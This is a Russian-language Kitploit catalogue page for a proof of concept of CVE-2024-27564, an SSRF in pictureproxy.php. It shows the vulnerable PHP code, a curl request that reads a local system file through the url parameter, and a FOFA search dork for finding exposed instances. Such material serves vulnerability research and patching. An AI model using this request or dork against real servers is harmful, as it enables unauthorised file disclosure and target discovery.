Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-27564 — Доказательство концепции эксплуатации уязвимости CVE-2024-27564, межсерверной подделки запросов (SSRF) в pictureproxy.php, позволяющей неаутентифицированным удаленным злоумышленникам внедрять произвольные URL через параметр url. | Kitploit
Инструменты/GitHubGitHub/chsxthwik/cve-2024-27564
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииВеб-безопасность
GitHubchsxthwik/cve-2024-27564

CVE-2024-27564

Доказательство концепции эксплуатации уязвимости CVE-2024-27564, межсерверной подделки запросов (SSRF) в pictureproxy.php, позволяющей неаутентифицированным удаленным злоумышленникам внедрять произвольные URL через параметр url.

Репозиторий
12411 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-27564

Описание:

Уязвимость в pictureproxy.php позволяет удалённым злоумышленникам выполнять произвольные запросы путём внедрения URL-адресов в параметр url. Эта SSRF-уязвимость может быть использована без аутентификации, что делает её особенно опасной.

Уязвимый код находится в файле pictureproxy.php. Проблема возникает из-за того, что функция не проверяет должным образом параметр url. Переменная $_GET['url'] передаётся функции file_get_contents(), которая получает содержимое по указанному URL. Это может привести к SSRF.

PoC:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Запрос Curl:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Dorking:

FOFA= "title="ChatGPT个人专用版""

Устранение:

Необходимо правильное управление проверкой входных данных.

Скачать инструмент